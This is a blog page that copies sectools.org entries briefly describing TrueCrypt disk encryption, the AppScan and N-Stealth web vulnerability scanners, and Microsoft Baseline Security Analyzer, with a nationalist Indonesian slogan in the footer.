Windows
Command-line interface
GUI Interface
Source code
TrueCrypt : Open-Source Disk Encryption Software for Windows and Linux
TrueCrypt is an excellent open source disk encryption system. Users can encrypt entire filesystems, which are then on-the-fly encrypted/decrypted as needed without user intervention beyond entering their passphrase intially. A clever hidden volume feature allows you to hide a 2nd layer of particularly sensitive content with plausible deniability about whether it exists. Then if you are forced to give up your passphrase, you give them the first-level secret. Even with that, attackers cannot prove that a second level key even exists. See all encryption tools

#98
new
  TITLE=
Windows
GUI Interface
Rational AppScan : Commercial Web Vulnerability Scanner
AppScan provides security testing throughout the application development lifecycle, easing unit testing and security assurance early in the development phase. Appscan scans for many common vulnerabilities, such as cross site scripting, HTTP response splitting, parameter tampering, hidden field manipulation, backdoors/debug options, buffer overflows and more. Appscan was merged into IBM's Rational division after IBM purchased it's original developer (Watchfire) in 2007. See all web vulnerability scanners

#99
72
  TITLE=
Windows
GUI Interface
N-Stealth : Web server scanner
N-Stealth is a commercial web server security scanner. It is generally updated more frequently than free web scanners such as Whisker/libwhisker and Nikto, but do take their web site with a grain of salt. The claims of "30,000 vulnerabilities and exploits" and "Dozens of vulnerability checks are added every day" are highly questionable. Also note that essentially all general VA tools such as Nessus, ISS Internet Scanner, Retina, SAINT, and Sara include web scanning components. They may not all be as up-to-date or flexible though. N-Stealth is Windows only and no source code is provided. See all web vulnerability scanners

#100
37
Windows
GUI Interface
MBSA : Microsoft Baseline Security Analyzer
Microsoft Baseline Security Analyzer (MBSA) is an easy-to-use tool designed for the IT professional that helps small and medium-sized businesses determine their security state in accordance with Microsoft security recommendations and offers specific remediation guidance. Built on the Windows Update Agent and Microsoft Update infrastructure, MBSA ensures consistency with other Microsoft management products including Microsoft Update (MU), Windows Server Update Services (WSUS), Systems Management Server (SMS) and Microsoft Operations Manager (MOM). Apparently MBSA on average scans over 3 million computers each week. See all vulnerability scanners

FROM : http://sectools.org/ 
 
Copyright © XAXNERX Blogger Theme by BloggerThemes & newwpthemes
. . . : : : WE LOVE INDONESIA Ini dadaku, mana dadamu Kalau Malaysia mau konfrontasi ekonomi Kita hadapi dengan konfrontasi ekonomi Kalau Malaysia mau konfrontasi politik Kita hadapi dengan konfrontasi politik Kalau Malaysia mau konfrontasi militer Kita hadapi dengan konfrontasi militer : : : . . .